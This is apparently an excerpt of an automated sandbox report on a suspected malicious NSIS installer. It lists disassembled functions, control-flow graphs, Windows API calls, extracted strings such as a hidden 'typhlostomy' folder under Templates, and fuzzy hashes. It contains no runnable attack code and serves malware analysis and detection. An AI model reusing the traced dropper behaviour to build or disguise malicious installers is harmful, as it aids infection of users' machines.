                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: AddressHandleLibraryLoadModuleProc
                                                          • String ID:
                                                          • API String ID: 310444273-0
                                                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction ID: 6db28869a22d2b590e25977263656b8717a92efcd7e963286bbc5c179789795b
                                                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                                                          • Instruction Fuzzy Hash: F2E0C236E0C120ABC7225B209E4896B73ACAFE9651305043EF506F6280C774EC229BE9
                                                          Function 0040206A Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123comCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CoCreateInstance.OLE32(00407474,?,00000001,00407464,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020BD
                                                          Strings
                                                          • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy, xrefs: 004020FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: CreateInstance
                                                          • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy
                                                          • API String ID: 542301482-3249457974
                                                          • Opcode ID: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction ID: 3f054c58238b343a02ca2e9776fd111f4d7efc3a485c04e582207c90830a0c16
                                                          • Opcode Fuzzy Hash: 330b72db69b131769a7f43a84d7f99a236d9a4fefb58777c6ca7a9fe0b558edb
                                                          • Instruction Fuzzy Hash: BC414F75A00105BFCB00DFA4C988EAE7BB5BF49318B20416AF505EF2D1D679AD41CB54
                                                          Function 00403CC2 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 174 403cc2-403cd4 175 403e15-403e24 174->175 176 403cda-403ce0 174->176 177 403e73-403e88 175->177 178 403e26-403e6e GetDlgItem * 2 call 40419a SetClassLongW call 40140b 175->178 176->175 179 403ce6-403cef 176->179 183 403ec8-403ecd call 4041e6 177->183 184 403e8a-403e8d 177->184 178->177 180 403cf1-403cfe SetWindowPos 179->180 181 403d04-403d07 179->181 180->181 185 403d21-403d27 181->185 186 403d09-403d1b ShowWindow 181->186 196 403ed2-403eed 183->196 188 403ec0-403ec2 184->188 189 403e8f-403e9a call 401389 184->189 191 403d43-403d46 185->191 192 403d29-403d3e DestroyWindow 185->192 186->185 188->183 195 404167 188->195 189->188 211 403e9c-403ebb SendMessageW 189->211 202 403d48-403d54 SetWindowLongW 191->202 203 403d59-403d5f 191->203 200 404144-40414a 192->200 199 404169-404170 195->199 197 403ef6-403efc 196->197 198 403eef-403ef1 call 40140b 196->198 207 403f02-403f0d 197->207 208 404125-40413e DestroyWindow EndDialog 197->208 198->197 200->195 205 40414c-404152 200->205 202->199 209 403e02-403e10 call 404201 203->209 210 403d65-403d76 GetDlgItem 203->210 205->195 212 404154-40415d ShowWindow 205->212 207->208 213 403f13-403f60 call 405f6a call 40419a * 3 GetDlgItem 207->213 208->200 209->199 214 403d95-403d98 210->214 215 403d78-403d8f SendMessageW IsWindowEnabled 210->215 211->199 212->195 244 403f62-403f67 213->244 245 403f6a-403fa6 ShowWindow KiUserCallbackDispatcher call 4041bc EnableWindow 213->245 218 403d9a-403d9b 214->218 219 403d9d-403da0 214->219 215->195 215->214 222 403dcb-403dd0 call 404173 218->222 223 403da2-403da8 219->223 224 403dae-403db3 219->224 222->209 226 403de9-403dfc SendMessageW 223->226 229 403daa-403dac 223->229 225 403db5-403dbb 224->225 224->226 230 403dd2-403ddb call 40140b 225->230 231 403dbd-403dc3 call 40140b 225->231 226->209 229->222 230->209 241 403ddd-403de7 230->241 240 403dc9 231->240 240->222 241->240 244->245 248 403fa8-403fa9 245->248 249 403fab 245->249 250 403fad-403fdb GetSystemMenu EnableMenuItem SendMessageW 248->250 249->250 251 403ff0 250->251 252 403fdd-403fee SendMessageW 250->252 253 403ff6-404034 call 4041cf call 405f48 lstrlenW call 405f6a SetWindowTextW call 401389 251->253 252->253 253->196 262 40403a-40403c 253->262 262->196 263 404042-404046 262->263 264 404065-404079 DestroyWindow 263->264 265 404048-40404e 263->265 264->200 267 40407f-4040ac CreateDialogParamW 264->267 265->195 266 404054-40405a 265->266 266->196 268 404060 266->268 267->200 269 4040b2-404109 call 40419a GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 267->269 268->195 269->195 274 40410b-40411e ShowWindow call 4041e6 269->274 276 404123 274->276 276->200
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CFE
                                                          • ShowWindow.USER32(?), ref: 00403D1B
                                                          • DestroyWindow.USER32 ref: 00403D2F
                                                          • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403D4B
                                                          • GetDlgItem.USER32(?,?), ref: 00403D6C
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403D80
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403D87
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403E35
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403E3F
                                                          • SetClassLongW.USER32(?,000000F2,?), ref: 00403E59
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403EAA
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403F50
                                                          • ShowWindow.USER32(00000000,?), ref: 00403F71
                                                          • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403F83
                                                          • EnableWindow.USER32(?,?), ref: 00403F9E
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403FB4
                                                          • EnableMenuItem.USER32(00000000), ref: 00403FBB
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00403FD3
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00403FE6
                                                          • lstrlenW.KERNEL32(004226E8,?,004226E8,00428200), ref: 0040400F
                                                          • SetWindowTextW.USER32(?,004226E8), ref: 00404023
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404157
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: &B
                                                          • API String ID: 3282139019-3208460036
                                                          • Opcode ID: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction ID: 615a13079a357bc63dc92eaebf5b97e46402dd0953b19927b77141fc7a078d9b
                                                          • Opcode Fuzzy Hash: df49f6763b05bfa84c1d779e4394ea7a5d72abe941678efbb561a9aecc95dd19
                                                          • Instruction Fuzzy Hash: B6C1A371A04201BBDB216F61ED49E2B3AA8FB95705F40093EF601B51F1C7799892DB2E
                                                          Function 0040391F Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 40391f-403937 call 4062b2 280 403939-403949 call 405e8f 277->280 281 40394b-403982 call 405e15 277->281 290 4039a5-4039ce call 403bf5 call 405a9b 280->290 285 403984-403995 call 405e15 281->285 286 40399a-4039a0 lstrcatW 281->286 285->286 286->290 295 403a60-403a68 call 405a9b 290->295 296 4039d4-4039d9 290->296 301 403a76-403a9b LoadImageW 295->301 302 403a6a-403a71 call 405f6a 295->302 296->295 297 4039df-403a07 call 405e15 296->297 297->295 304 403a09-403a0d 297->304 306 403b1c-403b24 call 40140b 301->306 307 403a9d-403acd RegisterClassW 301->307 302->301 308 403a1f-403a2b lstrlenW 304->308 309 403a0f-403a1c call 4059c0 304->309 320 403b26-403b29 306->320 321 403b2e-403b39 call 403bf5 306->321 310 403ad3-403b17 SystemParametersInfoW CreateWindowExW 307->310 311 403beb 307->311 315 403a53-403a5b call 405993 call 405f48 308->315 316 403a2d-403a3b lstrcmpiW 308->316 309->308 310->306 313 403bed-403bf4 311->313 315->295 316->315 319 403a3d-403a47 GetFileAttributesW 316->319 323 403a49-403a4b 319->323 324 403a4d-403a4e call 4059df 319->324 320->313 330 403bc2-403bc3 call 4052c5 321->330 331 403b3f-403b5c ShowWindow LoadLibraryW 321->331 323->315 323->324 324->315 337 403bc8-403bca 330->337 333 403b65-403b77 GetClassInfoW 331->333 334 403b5e-403b63 LoadLibraryW 331->334 335 403b79-403b89 GetClassInfoW RegisterClassW 333->335 336 403b8f-403bb2 DialogBoxParamW call 40140b 333->336 334->333 335->336 341 403bb7-403bc0 call 40386f 336->341 339 403be4-403be6 call 40140b 337->339 340 403bcc-403bd2 337->340 339->311 340->320 342 403bd8-403bdf call 40140b 340->342 341->313 342->320
                                                          APIs
                                                            • Part of subcall function 004062B2: GetModuleHandleA.KERNEL32(?,?,00000020,0040339D,00000009), ref: 004062C4
                                                            • Part of subcall function 004062B2: LoadLibraryA.KERNELBASE(?,?,00000020,0040339D,00000009), ref: 004062CF
                                                            • Part of subcall function 004062B2: GetProcAddress.KERNEL32(00000000,?), ref: 004062E0
                                                          • lstrcatW.KERNEL32(1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,00000000,"C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"), ref: 004039A0
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A20
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,1033,004226E8,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226E8,00000000), ref: 00403A33
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403A3E
                                                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy), ref: 00403A87
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          • RegisterClassW.USER32(004281A0), ref: 00403AC4
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403ADC
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B11
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B47
                                                          • LoadLibraryW.KERNELBASE(RichEd20), ref: 00403B58
                                                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403B63
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004281A0), ref: 00403B73
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004281A0), ref: 00403B80
                                                          • RegisterClassW.USER32(004281A0), ref: 00403B89
                                                          • DialogBoxParamW.USER32(?,00000000,00403CC2,00000000), ref: 00403BA8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb$&B
                                                          • API String ID: 914957316-1723499676
                                                          • Opcode ID: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction ID: 309fb0296e4a6d1bba18aa3b2e86eaa258190dfd088e540a173f113b23667d40
                                                          • Opcode Fuzzy Hash: 9ff61719f6c30c529665ce4dbc08b581b5599c43b58c29c5b92350d035ae6190
                                                          • Instruction Fuzzy Hash: BE61B570644200BED720AF669C46F2B3A7CEB84749F40457FF945B62E2DB796902CA3D
                                                          Function 00402DBC Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203memoryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 348 402dbc-402e0a GetTickCount GetModuleFileNameW call 405bb4 351 402e16-402e44 call 405f48 call 4059df call 405f48 GetFileSize 348->351 352 402e0c-402e11 348->352 360 402f34-402f42 call 402d1a 351->360 361 402e4a-402e61 351->361 353 40305b-40305f 352->353 367 403013-403018 360->367 368 402f48-402f4b 360->368 363 402e63 361->363 364 402e65-402e72 call 4032f9 361->364 363->364 372 402e78-402e7e 364->372 373 402fcf-402fd7 call 402d1a 364->373 367->353 370 402f77-402fc3 GlobalAlloc call 4063ce call 405be3 CreateFileW 368->370 371 402f4d-402f65 call 40330f call 4032f9 368->371 397 402fc5-402fca 370->397 398 402fd9-403009 call 40330f call 403062 370->398 371->367 400 402f6b-402f71 371->400 377 402e80-402e98 call 405b6f 372->377 378 402efe-402f02 372->378 373->367 382 402f0b-402f11 377->382 393 402e9a-402ea1 377->393 381 402f04-402f0a call 402d1a 378->381 378->382 381->382 389 402f13-402f21 call 406360 382->389 390 402f24-402f2e 382->390 389->390 390->360 390->361 393->382 399 402ea3-402eaa 393->399 397->353 408 40300e-403011 398->408 399->382 401 402eac-402eb3 399->401 400->367 400->370 401->382 403 402eb5-402ebc 401->403 403->382 405 402ebe-402ede 403->405 405->367 407 402ee4-402ee8 405->407 409 402ef0-402ef8 407->409 410 402eea-402eee 407->410 408->367 411 40301a-40302b 408->411 409->382 412 402efa-402efc 409->412 410->360 410->409 413 403033-403038 411->413 414 40302d 411->414 412->382 415 403039-40303f 413->415 414->413 415->415 416 403041-403059 call 405b6f 415->416 416->353
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402DD0
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,00000400), ref: 00402DEC
                                                            • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00405BB8
                                                            • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe,80000000,00000003), ref: 00402E35
                                                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\TEC-SPC-94.03.60.175.07.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                          • API String ID: 2803837635-2882808343
                                                          • Opcode ID: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction ID: b2cc58b1aa553f56ba66d3b0850f03698e33e3340d89f7fe3e9d1fe3a0eb5287
                                                          • Opcode Fuzzy Hash: dbc4309bf9e12582ea8865ce62b28691ef8d5c521c6be9f7d6ce07414c4970ed
                                                          • Instruction Fuzzy Hash: 43610371941205ABDB209FA4DD85B9E3BB8EB04354F20447BF605B72D2C7BC9E418BAD
                                                          Function 00401752 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 545 401752-401777 call 402b3a call 405a0a 550 401781-401793 call 405f48 call 405993 lstrcatW 545->550 551 401779-40177f call 405f48 545->551 557 401798-401799 call 4061dc 550->557 551->557 560 40179e-4017a2 557->560 561 4017a4-4017ae call 40628b 560->561 562 4017d5-4017d8 560->562 570 4017c0-4017d2 561->570 571 4017b0-4017be CompareFileTime 561->571 564 4017e0-4017fc call 405bb4 562->564 565 4017da-4017db call 405b8f 562->565 572 401870-401899 call 4051f2 call 403062 564->572 573 4017fe-401801 564->573 565->564 570->562 571->570 587 4018a1-4018ad SetFileTime 572->587 588 40189b-40189f 572->588 574 401852-40185c call 4051f2 573->574 575 401803-401841 call 405f48 * 2 call 405f6a call 405f48 call 405724 573->575 585 401865-40186b 574->585 575->560 608 401847-401848 575->608 589 4029d0 585->589 591 4018b3-4018be CloseHandle 587->591 588->587 588->591 592 4029d2-4029d6 589->592 594 4018c4-4018c7 591->594 595 4029c7-4029ca 591->595 597 4018c9-4018da call 405f6a lstrcatW 594->597 598 4018dc-4018df call 405f6a 594->598 595->589 603 4018e4-402243 call 405724 597->603 598->603 603->592 608->585 610 40184a-40184b 608->610 610->574
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 00401793
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy,?,?,00000031), ref: 004017B8
                                                            • Part of subcall function 00405F48: lstrcpynW.KERNEL32(?,?,00000400,004033C8,00428200,NSIS Error), ref: 00405F55
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352612399.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_TEC-SPC-94.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp$C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\typhlostomy$Call
                                                          • API String ID: 1941528284-1720819339
                                                          • Opcode ID: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction ID: 22a22a0f5d261001ccd7191b61e6a6ae22ba545f5f0eb33ed6189b5534195358
                                                          • Opcode Fuzzy Hash: 8fd7ff773941625183321c21c1d438156bd1c93f7609a995d7972b8441070f6c
                                                          • Instruction Fuzzy Hash: 3341C071900515BACF11BBB5CC86EAF3679EF06369F20423BF422B10E1C73C8A419A6D
                                                          Function 004051F2 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 611 4051f2-405207 612 40520d-40521e 611->612 613 4052be-4052c2 611->613 614 405220-405224 call 405f6a 612->614 615 405229-405235 lstrlenW 612->615 614->615 617 405252-405256 615->617 618 405237-405247 lstrlenW 615->618 620 405265-405269 617->620 621 405258-40525f SetWindowTextW 617->621 618->613 619 405249-40524d lstrcatW 618->619 619->617 622 40526b-4052ad SendMessageW * 3 620->622 623 4052af-4052b1 620->623 621->620 622->623 623->613 624 4052b3-4052b6 623->624 624->613
                                                          APIs
                                                          • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                          • lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                          • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                          • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsrF34D.tmp\System.dll), ref: 0040525F
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                          • SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2352288638.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.2352270908.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352340381.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2352361566.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
